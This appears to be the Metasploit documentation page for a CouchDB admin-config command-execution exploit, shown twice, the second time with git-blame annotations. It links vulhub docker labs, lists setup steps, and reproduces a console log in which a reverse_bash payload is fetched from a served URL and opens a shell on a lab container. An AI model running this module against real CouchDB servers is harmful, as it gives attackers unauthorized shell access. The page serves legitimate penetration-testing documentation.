documentation/modules/exploit/linux/http/apache_couchdb_cmd_exec.md

## Description  

CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options
include paths for operating system-level binaries that are subsequently launched by CouchDB.
This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell
commands as the CouchDB user,including downloading and executing scripts from the public internet.

## Vulnerable Application  

**Vulnerable Application Link** 

- docker  

Couchdb 2.x: https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635  
Couchdb 1.x: https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12636


### Vulnerable Application Installation Setup.

Change dictory to CVE-2017-1263X, and run `docker-compose up -d` 


## Verification Steps  

  1. Install the application
  2. Start msfconsole
  3. Do: ```use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb```
  4. Do: ``check``

``[*] 192.168.77.139:5984 The target appears to be vulnerable.``

  5. Do: ``set srvhost <ip>``
  6. Do: ``set srvport <port>``
  7. Do: ``set lhost <ip>``
  8. Do: ``set lport <port>``
  9. Do: ``exploit``
  10. You should get a shell.

## Options

### URIPATH

``URIPATH`` by default is random, you can change it if you want.

### HttpUsername, HttpPassword  

Sometimes it requires authentication, set these options to authorize.  


## Scenarios  

### Apache CouchDB on Linux

```
msf5 > use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > show options 

Module options (exploit/linux/http/apache_couchdb_cmd_exec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password to login with
   HttpUsername                   no        The username to login as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                          yes       The target address
   RPORT         5984             yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit to download and execute. (default is random)
   VHOST                          no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set rhost 192.168.77.139
rhost => 192.168.77.139
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > check 
[*] 192.168.77.139:5984 The target appears to be vulnerable.
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set srvhost 192.168.77.139 
srvhost => 192.168.77.139
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set srvport 8888
srvport => 8888
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set lhost 192.168.77.139 
lhost => 192.168.77.139
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > exploit 
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.77.139:4444 
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > [*] Using URL: http://192.168.77.139:8888/rXrdf2
[*] 192.168.77.139:5984 - The 1 time to exploit
[*] 192.168.77.139:5984 - Sending the payload to the server...
[*] Command shell session 1 opened (192.168.77.139:4444 -> 172.18.0.2:58348) at 2018-03-27 06:18:21 -0400
[*] Server stopped.
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 1
[*] Starting interaction with 1...
id
uid=1000(couchdb) gid=999(couchdb) groups=999(couchdb)
```
Add document of exploit module apache_couchdb_cmd_exec 2018-03-29 02:40:51 -04:00			`## Description`

remove and check for instruction text 2020-03-24 09:15:04 -04:00			`CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options`
			`include paths for operating system-level binaries that are subsequently launched by CouchDB.`
			`This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell`
			`commands as the CouchDB user,including downloading and executing scripts from the public internet.`
Add document of exploit module apache_couchdb_cmd_exec 2018-03-29 02:40:51 -04:00
			`## Vulnerable Application`

			`Vulnerable Application Link`

			`- docker`

			`Couchdb 2.x: https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635`
			`Couchdb 1.x: https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12636`


remove and check for instruction text 2020-03-24 09:15:04 -04:00			`### Vulnerable Application Installation Setup.`
Add document of exploit module apache_couchdb_cmd_exec 2018-03-29 02:40:51 -04:00
			Change dictory to CVE-2017-1263X, and run `docker-compose up -d`


			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: ```use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb```
			4. Do: ``check``

			``[*] 192.168.77.139:5984 The target appears to be vulnerable.``

			5. Do: ``set srvhost <ip>``
			6. Do: ``set srvport <port>``
			7. Do: ``set lhost <ip>``
			8. Do: ``set lport <port>``
			9. Do: ``exploit``
			`10. You should get a shell.`

fix up spaces on options header 2020-01-16 10:52:13 -05:00			`## Options`
Add document of exploit module apache_couchdb_cmd_exec 2018-03-29 02:40:51 -04:00
remove and check for instruction text 2020-03-24 09:15:04 -04:00			`### URIPATH`
Add document of exploit module apache_couchdb_cmd_exec 2018-03-29 02:40:51 -04:00
			``URIPATH`` by default is random, you can change it if you want.

remove and check for instruction text 2020-03-24 09:15:04 -04:00			`### HttpUsername, HttpPassword`
Add document of exploit module apache_couchdb_cmd_exec 2018-03-29 02:40:51 -04:00
remove and check for instruction text 2020-03-24 09:15:04 -04:00			`Sometimes it requires authentication, set these options to authorize.`
Add document of exploit module apache_couchdb_cmd_exec 2018-03-29 02:40:51 -04:00

			`## Scenarios`

remove and check for instruction text 2020-03-24 09:15:04 -04:00			`### Apache CouchDB on Linux`
Add document of exploit module apache_couchdb_cmd_exec 2018-03-29 02:40:51 -04:00
			```
			`msf5 > use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb`
			`msf5 exploit(linux/http/apache_couchdb_cmd_exec) > show options`

			`Module options (exploit/linux/http/apache_couchdb_cmd_exec):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`HttpPassword no The password to login with`
			`HttpUsername no The username to login as`
			`Proxies no A proxy chain of format type:host:port[,type:host:port][...]`
			`RHOST yes The target address`
			`RPORT 5984 yes The target port (TCP)`
			`SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0`
			`SRVPORT 8080 yes The local port to listen on.`
			`SSL false no Negotiate SSL/TLS for outgoing connections`
			`SSLCert no Path to a custom SSL certificate (default is randomly generated)`
			`URIPATH no The URI to use for this exploit to download and execute. (default is random)`
			`VHOST no HTTP server virtual host`


			`Payload options (cmd/unix/reverse_bash):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`LHOST yes The listen address`
			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Automatic`


			`msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set rhost 192.168.77.139`
			`rhost => 192.168.77.139`
			`msf5 exploit(linux/http/apache_couchdb_cmd_exec) > check`
			`[*] 192.168.77.139:5984 The target appears to be vulnerable.`
			`msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set srvhost 192.168.77.139`
			`srvhost => 192.168.77.139`
			`msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set srvport 8888`
			`srvport => 8888`
			`msf5 exploit(linux/http/apache_couchdb_cmd_exec) > set lhost 192.168.77.139`
			`lhost => 192.168.77.139`
			`msf5 exploit(linux/http/apache_couchdb_cmd_exec) > exploit`
			`[*] Exploit running as background job 0.`
			`[*] Started reverse TCP handler on 192.168.77.139:4444`
			`msf5 exploit(linux/http/apache_couchdb_cmd_exec) > [*] Using URL: http://192.168.77.139:8888/rXrdf2`
			`[*] 192.168.77.139:5984 - The 1 time to exploit`
			`[*] 192.168.77.139:5984 - Sending the payload to the server...`
			`[*] Command shell session 1 opened (192.168.77.139:4444 -> 172.18.0.2:58348) at 2018-03-27 06:18:21 -0400`
			`[*] Server stopped.`
			`msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 1`
			`[*] Starting interaction with 1...`
			`id`
			`uid=1000(couchdb) gid=999(couchdb) groups=999(couchdb)`
			```